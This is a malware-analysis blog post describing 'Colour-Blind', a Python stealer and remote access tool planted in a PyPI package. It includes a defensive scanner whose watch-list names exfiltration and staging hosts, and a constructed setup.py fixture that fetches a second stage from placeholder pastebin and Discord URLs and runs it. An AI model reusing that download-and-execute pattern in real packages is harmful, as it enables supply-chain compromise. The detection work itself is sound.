Wed, Mar 1, 2023

PyPI Packages Used to Deliver Python Remote Access Tools

Key Takeaways

  • Kroll has identified a fully featured information stealer and remote access tool (RAT) in the Python Package Index (PyPI) that it is calling “Colour-Blind”.
  • The malicious package was found as part of a project to obtain more awareness of initial attack vectors and uses a tool developed by Kroll’s threat intelligence team.
  • The “Colour-Blind” malware points to the democratization of cybercrime that could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others.
 

Summary

As part of a project to obtain more awareness of initial attack vectors outside of the common phishing and web application exploitation, Kroll’s Cyber Threat Intelligence team has developed a tool to enable the enhanced monitoring of the Python Package Index (PyPI) to find and obtain malicious packages that are added to it.

We have discovered several packages with varying degrees of sophistication. In the following article, we analyze one of the more interesting malicious packages uncovered, which Kroll has named “Colour-Blind”. Colour-Blind is a fully featured information stealer and remote access tool (RAT) written in Python. In our research, we present a detailed analysis of its functionality and an assessment of the skill level of the actors who created the malware.

Initial “Colourfool” Discovery

The package “colourfool” was detected by our tool, and a copy was archived for manual inspection shortly after it was uploaded to PyPI.

The package contained only one Python file of note, a suspiciously large “setup.py” last modified four days earlier.

Figure 1 - Malicious Package Files and Metadata

The sole purpose of the script seemed to be downloading a file from the internet, hiding it from the user and executing it. The function, therefore, immediately seemed suspicious and likely malicious.

Figure 2 – Second Stage Download and Execution

The function that provided the URL for download was also suspicious. It attempted to get a URL from a pastebin[.]com snippet and, failing this, returned a hardcoded Discord content delivery network (CDN) URL. Within a legitimate library, the use of hardcoded URLs for downloading executable resources “on the fly” is uncommon. This is particularly true when those URLs aren’t persistent and are unlikely to be reachable after a short period of time.

Figure 3 – Calculation of Second Stage URL

Other suspicious aspects of this script were the redirection of standard output to a “null device,” and the copying of the downloaded file into the same directory in which the interpreter “python.exe” resides. The copy functionality is preceded by a check that forces an exit if the file already exists. This is a common method malware uses to avoid reinfecting a host.
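
The indicators called out above (a hardcoded pastebin or Discord CDN URL, output redirected to the null device, a path derived from the interpreter location, and a download followed by process execution) can be checked statically. The AST-based scanner below is an added example written for this article, not Kroll’s monitoring tool or any code from the package; its watch-listed hosts and call names are assumptions drawn from the behaviour described here, and the setup.py it scans is a constructed fixture with placeholder URLs.

```python
import ast
from urllib.parse import urlparse
# Hosts the post describes for staging (pastebin, Discord CDN) and exfiltration (transfer.sh).
WATCHED_HOSTS = {"pastebin.com", "cdn.discordapp.com", "transfer.sh"}
NETWORK_CALLS = {"urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.startfile"}

SAMPLE_SETUP_PY = '''# constructed fixture modelled on the behaviour described above; URLs are placeholders
import os, sys, subprocess, urllib.request
sys.stdout = open(os.devnull, "w")
def stage_url():
    try:
        return urllib.request.urlopen("https://pastebin.com/raw/PLACEHOLDER").read().decode()
    except Exception:
        return "https://cdn.discordapp.com/attachments/PLACEHOLDER/stage2.zip"
dest = os.path.join(os.path.dirname(sys.executable), "stage2.py")
subprocess.Popen([sys.executable, dest])
'''

def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None

def scan_setup_py(source):
    """Return sorted heuristic findings for one setup.py source text."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            try:
                host = urlparse(node.value).hostname
            except ValueError:  # malformed bracketed literals make urlparse raise
                host = None
            if host in WATCHED_HOSTS:
                findings.add(f"hardcoded URL on watched host: {host}")
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in NETWORK_CALLS:
                findings.add(f"network download: {name}")
            elif name in EXEC_CALLS:
                findings.add(f"process execution: {name}")
            elif name == "open" and node.args and _dotted(node.args[0]) == "os.devnull":
                findings.add("output redirected to null device")
        elif isinstance(node, ast.Attribute) and _dotted(node) == "sys.executable":
            findings.add("references interpreter path (sys.executable)")
    return sorted(findings)
```

Any single finding is weak on its own; it is the combination within one small setup.py that merits a manual look.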

The second stage archive contained only one file, “code.py”, which was significantly larger than the script analyzed above; this new file was over 300 kilobytes (KB) and 2,038 lines of code.

Figure 4 – Second Stage Metadata

The new script contains a much larger imports section, including modules that enable malicious activity in the form of keylogging or stealing cookies.

Figure 5 – Imports Section Showing Modules for Lower-Level Access

On looking through the code, some of it is blatantly malicious, for example, a function named “disable_antivirus” where the code attempts to add its location to the Microsoft Defender Antivirus exclusion path in Windows.

Figure 6 – Overtly Malicious Function Name

Defense Evasion Behavior

In some other parts of the code, some attempt at obfuscation was made, although it mostly amounted to variables named with a simple pattern of only two characters. This was easy to turn “human readable” by using a regular expression.
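
The renaming step described above, as an added example that is not the author’s script: instead of a bare regular expression it uses Python’s tokenize module so that string literals and attribute names are left alone, and it skips keywords, builtins and imported module names. The obfuscated snippet it rewrites is constructed for the example.

```python
import ast
import builtins
import io
import keyword
import tokenize

# Two-character names that are legitimate Python and must never be renamed.
PROTECTED = set(keyword.kwlist) | set(dir(builtins))

# Constructed sample in the style described above: every variable is a two-letter name.
SAMPLE_OBFUSCATED = '''import os
def Ab(Cd, Ef):
    Gh = os.path.join(Cd, Ef)
    if Gh:
        return Gh
    return Ab(Ef, Cd)
'''

def _imported_names(source):
    """Names bound by import statements; these belong to real modules, so keep them."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                names.add(alias.asname or alias.name.split(".")[0])
    return names

def rename_short_identifiers(source, prefix="var"):
    """Replace every two-character identifier with a numbered placeholder, consistently,
    skipping keywords, builtins, imported names and attribute names after a dot.
    Returns (rewritten_source, {old_name: new_name})."""
    keep = PROTECTED | _imported_names(source)
    tokens = list(tokenize.generate_tokens(io.StringIO(source).readline))
    mapping, out = {}, []
    for i, tok in enumerate(tokens):
        is_attr = i > 0 and tokens[i - 1].string == "."
        if (tok.type == tokenize.NAME and len(tok.string) == 2
                and tok.string not in keep and not is_attr):
            new = mapping.setdefault(tok.string, f"{prefix}{len(mapping) + 1}")
            tok = tok._replace(string=new)
        out.append(tok)
    # untokenize keeps the original column layout, so the result stays readable
    return tokenize.untokenize(out), mapping
```

The numbered placeholders only make the data flow visible; choosing meaningful names is still the analyst’s job once each variable’s role is understood.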

Figure 7 – Obfuscated Variable Names

The combination of obfuscation alongside blatant malicious code indicates that it is unlikely that all the code was developed by a single entity. It is possible that the final developer mostly utilized other people’s code, adding it via copy and paste.

The second stage contains a function for obtaining a URL that is similar to the one in the original script; however, in this second stage, the Pastebin snippet was encrypted.

Figure 8 – Similar Function to Figure 3, However, a Decryption Routine is Now Present

The key for decrypting this URL was hardcoded in the script, enabling us to obtain the following domain: “clearstride[.]io”.

SSL information for this domain indicates that the certificate was created on the same date as the original “setup.py” script.

Figure 9 – SSL/TLS Certificate for C2 Domain

The malware starts with a call to an external website to retrieve geolocation and other IP-related information.

Figure 10 – Code for Obtaining Public IP Address Information of Victim Host

A function that looks for indications of running inside a virtual machine is then called.

Figure 11 – Code for Detecting Virtualization Technologies

The final lookup is for the presence of any security research tools running in the system process list.

Figure 12 – Security Tool Search

This kind of defense evasion behavior is commonly seen where the actor is checking to make sure that the malicious code is not running in an automated security sandbox, to avoid it being identified as malicious. In this case, however, after the malware gets the information, it does nothing with most of it. For example, the result of the security research tool search is never referenced or checked. This behavior strengthens the hypothesis that the code has been plagiarized from multiple sources and that the final developer might not be particularly sophisticated in their methods.

Following this, the code tries to protect itself by using a combination of two functions to terminate processes it deems a threat. The first function is solely dedicated to killing Windows Task Manager.

Figure 13 – Task Manager Kill Code

The second termination function loops through running processes and kills them based on the presence of hardcoded strings within each window’s title text.

Figure 14 – Code to Find and Terminate Processes Based on Identifying Strings

Establishing Persistence

The persistence mechanism the malware uses is to add a Visual Basic (VB) script named “Essentials.vbs” to the “Start Up” folder within the user’s “Start Menu”. The VB script runs a Windows batch file that the malware places in the same folder as “python.exe”. This batch file will start the malware using Python every time the user logs in.

The malware’s function for file exfiltration utilizes “transfer[.]sh,” an anonymous file transfer website that seems to be becoming popular amongst threat actors.

Figure 15 – Data Exfiltration

There appears to be some code related to social engineering, generating an error message trying to persuade the user to re-run as administrator. There is also an embedded “Snake” game that appears to be a direct copy of the code from a GitHub repository. This game doesn’t seem to serve a purpose and didn’t start when the malware was run during testing. This could be another artifact indicating the irregular sourcing of this code.

Figure 16 – Social Engineering Present Within the Source Code

The malware triggers multiple subprocesses, including threads for cookies, passwords and cryptocurrency wallet theft.

Figure 17 – Multithreading Code

As a method of remote control, the malware starts a Flask web application, which it makes accessible to the internet via Cloudflare’s reverse tunnel utility “cloudflared,” bypassing any inbound firewall rules.

Colour-Blind Remote Access Tool (RAT) Functionality

The web application serves as a control panel for the malware, and the available options indicate the functionality of a Remote Access Trojan (RAT). The web code for this page is basic and looks somewhat childish in aesthetic, giving rise to our tracking name for this malware, “Colour-Blind,” based on the original PyPI package name (“colourfool”) and the design choices made here.

Figure 18 – Screenshot of the Malware Command Panel

The functionality of the RAT accessible from the control interface includes:

  • Tokens: Dumps to screen login tokens for several applications that use Chromium as an application framework, either directly or via Electron (electron.io); a notable example is Discord.
  • Passwords: Dumps passwords extracted from web browsers to screen
  • Cookies: Dumps all browser cookies to screen
  • Keys: Dumps data captured by the keylogger to screen
  • Applications: Provides a list of running applications and a button to terminate them
  • Data Dump: Sends all captured data to the C2 URL
  • Screen: Shows a screenshot of the user’s desktop and allows rudimentary interaction such as key presses
  • IP: Looks up IP information and displays it to screen (using a different function from the earlier one)
  • Open Browser: Opens a browser to a given webpage
  • Run: Runs a command via the operating system
  • Text Input: Sends keystrokes to the machine
  • Phantom/Metamask: Steals cryptocurrency wallet information
 

Figure 19 – Screenshot of Remote Desktop Viewing Functionality

Figure 20 – Process Terminate Panel

Figure 21 – Real-Time Key Logger

Figure 22 – The RAT running and accessible via Cloudflare Tunnel

We further examined the code and extracted all the endpoints of the web application and found several that were not linked from the interface.

Figure 23 – List of all Web Application Endpoints

The /camera endpoint allows the attacker to spy on an unsuspecting user via a web camera.

Figure 24 – Web Camera functionality being used to Snoop

There is also a series of endpoints starting with the letters “hvnc,” which deal with a hidden desktop created on the victim’s machine. “/hvncmanager” allows for the starting of a web browser on this hidden desktop.

Figure 25 – Opening of Chrome Web Browser on Hidden Desktop and not Visible to User

“/hvnc” will open the hidden desktop, allowing the threat actor to interact with it via mouse and keyboard. The ability to open a web browser in this hidden manner allows the threat actor to interact with the victim’s internet accounts, even those that lock a session cookie to an IP address or other unique host identifiers.

Figure 26 – Screenshot of Chrome running inside the Hidden Desktop Visible to Actor

“/hvncitem” enables custom commands to be executed on the hidden desktop via manipulation of the URL parameter “start”.

Figure 27 – Triggering a Process Start Via Manually Manipulating a Request to Malware

Figure 28 – Manually Triggered Process Being Run on Hidden Desktop

What Colour-Blind Tells Us

From analysis of the Colour-Blind malware, it is evident that this RAT has a lot of interesting features. It shows how the common functionality of malware can easily be written in modern languages such as Python. This malware also provides insight into how the democratization of cybercrime could lead to an intensified threat landscape, as multiple variants can be spawned from code sourced from others. As such, Kroll will continue to monitor open-source language repositories for further malware strains to enable further detection opportunities.

Kroll Recommendations

  • Ensure that all imported libraries are verified by developers
  • Consider using deployment processes that sandbox build targets before they are pushed to production
  • Use virtualized environments for development tasks that can be rapidly rebuilt should a malicious package be installed

